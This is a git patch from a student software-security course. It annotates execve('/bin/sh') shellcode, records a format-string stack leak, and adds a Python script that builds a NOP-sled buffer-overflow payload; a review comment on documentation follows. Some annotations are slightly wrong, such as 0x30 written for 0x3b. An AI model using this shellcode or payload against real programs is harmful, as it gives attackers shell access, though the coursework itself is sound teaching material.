From edc222cbf405c6bbc12bbfa4b49cfb651446da28 Mon Sep 17 00:00:00 2001
From: Mart Lubbers
Date: Thu, 12 Mar 2015 12:01:53 +0100
Subject: [PATCH] ass5bex1 done

---
 .../exercise1 | 40 +++++++++++++++++++
 .../exercise2 | 18 ++++-----
 .../sws1-assignment5b-s4109503-s4202015/t.py | 6 +++
 3 files changed, 55 insertions(+), 9 deletions(-)
 create mode 100644 ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise1
 create mode 100644 ass5b/mart/sws1-assignment5b-s4109503-s4202015/t.py

diff --git a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise1 b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise1
new file mode 100644
index 0000000..22d5af2
--- /dev/null
+++ b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise1
@@ -0,0 +1,40 @@
+a, b).
+\x48\x31\xd2 xor %rdx, %rdx
+Put in %rdx the value of %rdx xor'ed with %rdx. This basically means 0.
+
+\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68 mov $0x68732f6e69622f2f, %rbx
+Put "/bin/sh" in the %rbx register.
+
+\x48\xc1\xeb\x08 shr $0x8, %rbx
+Bitshift the %rbx register 8 places to the right
+
+\x53 push %rbx
+Put the %rbx register on the stack
+
+\x48\x89\xe7 mov %rsp, %rdi
+Put the top item on the stack(%rbx, "/bin/sh") in %rdi
+
+\x52 push %rdx
+Push %rdx on the stack(which was 0)
+
+\x57 push %rdi
+Push %rdi on the stack(which was %rbx, which was "/bin/sh")
+
+\x48\x89\xe6 mov %rsp, %rsi
+Put the top item from the stack in %rsi("/bin/sh")
+
+\xb0\x3b mov $0x3b, %al
+Put 0x30 in %al which is the short %rax, return value.
+
+\x0f\x05 syscall
+This does a sys_execve call. in the following format
+ sys_execve(%rdi, %rsi %rdx)
+ sys_execve(file, argv, envp)
+ sys_execve("/bin/sh", "/bin/sh", NULL);
+
+c)
+The shellcode will start up a shell.
+
+d)
+The string containing the shell code is not padded with zeros. Zero bytes
+must not occur in shell code.
diff --git a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2 b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2
index a07cb46..95b7f60 100644
--- a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2
+++ b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2
@@ -3,11 +3,10 @@ be garbled.
 b. "%lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx"
 The memory outputted is this:
-7ffff7ff80d0
+7ffff7ff805b
 7ffff7dd8de0
 fbad2088
 786c2520786c2520
-786c2520786c2520
 20786c2520786c25
 20786c2520786c25
 20786c2520786c25
@@ -20,14 +19,15 @@ fbad2088
 20786c2520786c25
 20786c2520786c25
 20786c2520786c25
-786c2520786c25
-7fffffffeb40
-7fffffffebd0
+786c25
+1
+7fffffffeb30
+7fffffffebc0
 4006a9
 0
 100400530
-7fffffffebe0
-4006c2
-0
-c.
+c. Frame pointer: 7fffffffeb30 or 7fffffffebc0
+ return address: 4006a9
+
+d. 17 words of 8 bytes therefore 136
diff --git a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/t.py b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/t.py
new file mode 100644
index 0000000..c913d1b
--- /dev/null
+++ b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/t.py
@@ -0,0 +1,6 @@
+shellcode = '\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb'\
+ '\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f\x05'
+nop = '\x0f\x1f'
+
+string = nop*50 + shellcode + "\x0f\x1f\x7f\xff\xff\xff\xeb\x3e"
+print(string)
-- 
2.20.1
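Review bot: The three constants in t.py are undocumented: `shellcode` and `nop` are bare hex literals, and the 8-byte literal appended on the `string = ...` line is explained nowhere in the file, so a reader must go to the separate `exercise1` answer file to learn what any of the bytes encode. A module docstring such as `"""Assignment 5b, exercise 1: assembles the byte string annotated instruction-by-instruction in ./exercise1 and writes it to stdout."""` plus a one-line comment above `nop` and above the final literal stating what each is intended to represent would make the script self-describing and keep the annotation in sync with the bytes. The file also has no shebang or interpreter-version comment, so which Python the `print(string)` line is meant for is left to the reader; a `# python2` or `# python3` note, or a shebang, would settle that. A more descriptive filename than `t.py` would help too, since the commit message ties it to exercise 1 but the name does not.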